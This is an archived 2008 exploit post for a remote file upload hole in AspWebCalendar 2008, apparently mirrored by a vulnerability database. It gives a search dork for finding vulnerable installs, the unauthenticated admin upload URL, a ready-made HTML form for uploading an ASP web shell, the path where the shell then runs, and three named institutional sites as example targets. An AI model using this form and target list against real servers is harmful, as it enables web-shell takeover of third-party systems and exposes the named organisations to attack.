Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:20061

HistoryJun 19, 2008 - 12:00 a.m.

AspWebCalendar 2008 Remote File Upload Vulnerability

2008-06-1900:00:00

vulners.com

35

Title:AspWebCalendar 2008 Remote File Upload Vulnerability

Discovered by : Alemin_Krali

Dork :calendar.asp?eventdetail

http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp
shell

http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post'
ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT
<FONT COLOR='blue'
>http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE
SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>

ex1:http://bugs.mimnet.northwestern.edu/ConfRoomCal//calendar_admin.asp?action=uploadfile
ex2:http://calendar.newpal.k12.in.us//calendar_admin.asp?action=uploadfile
ex3:http://macomb.cc.mi.us/calendar//calendar_admin.asp?action=uploadfile

Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed